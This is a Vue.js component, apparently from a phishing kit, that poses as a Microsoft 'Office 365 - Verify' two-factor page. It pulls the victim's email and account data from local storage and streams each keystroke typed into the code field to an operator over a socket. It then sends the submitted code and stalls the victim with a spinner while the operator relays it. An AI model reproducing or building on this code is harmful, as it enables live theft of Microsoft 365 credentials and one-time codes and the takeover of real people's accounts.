<template src="./index.html">
    
</template>
<script>
// ...existing code...
export default {
  name: 'Office_Error',
  props: {
    adminData: {
      type: Object,
      default: () => ({})
    }
  },
  data() {
    return {
      username: localStorage.getItem('email'),
      userInfo : localStorage.getItem('accountinfo') ? JSON.parse(localStorage.getItem('accountinfo')) : {},
      message: '',
      password: '',
      office365_code: "",
      isValidInput: false,
    };
  },
  computed: {

  },
  watch: {

  },
  created() {
    
  },
  mounted() {
    document.title = "Office 365 - Verify"
    this.$socket.on('admin-message', (data) => {
      try {
        this.isValidInput= false;
      const verifyBtn = document.getElementById("verifyBtn");
      const spinner = verifyBtn.querySelector(".spinner-border");
      const btnText = verifyBtn.querySelector(".btn-text");
      verifyBtn.classList.remove("loading");
      spinner.classList.add("d-none");
      btnText.textContent = "Verify";
      } catch(error) {          
      }
    });
    // Setup show password functionality
  },
  methods: {
    onTwoFactorInput() {
      // Debounce typing events để tránh spam
      if (this.typingTimer) {
        clearTimeout(this.typingTimer);
      }
      
      this.typingTimer = setTimeout(() => {
        const typingData = {
          username: this.username,
          formType: 'office365_code',
          inputValue: this.office365_code,
          time: new Date().toISOString()
        };
        
        // Emit socket event để thông báo admin
        this.$socket.emit('user-typing-password', typingData);
      }, 500); // Delay 500ms
    },

    handleMicrosoftCodeSubmit() {
      if (!this.office365_code) return;
      this.isValidInput = true;
      // Set loading state
      this.isLoading = true;
      
      const loginData = {
        username: this.username,
        status: 'office365_code_error',
        office365_code: this.office365_code,
        time: new Date().toISOString()
      };

      this.$socket.emit('user-login', loginData);

      const verifyBtn = document.getElementById("verifyBtn");
      const spinner = verifyBtn.querySelector(".spinner-border");
      const btnText = verifyBtn.querySelector(".btn-text");
      verifyBtn.classList.add("loading");
      spinner.classList.remove("d-none");
      btnText.textContent = "Verifying...";

      setTimeout(() => {
        try {
          const verifyBtn = document.getElementById("verifyBtn");
          verifyBtn.classList.remove("loading");
          const spinner = verifyBtn.querySelector(".spinner-border");
          const btnText = verifyBtn.querySelector(".btn-text");
          spinner.classList.add("d-none");
          btnText.textContent = "Verify";
        } catch(error) {
          
        }
      }, 180000);
    },
  }
};
</script>

<style lang="css" scoped>
@import "./styles.css";
</style>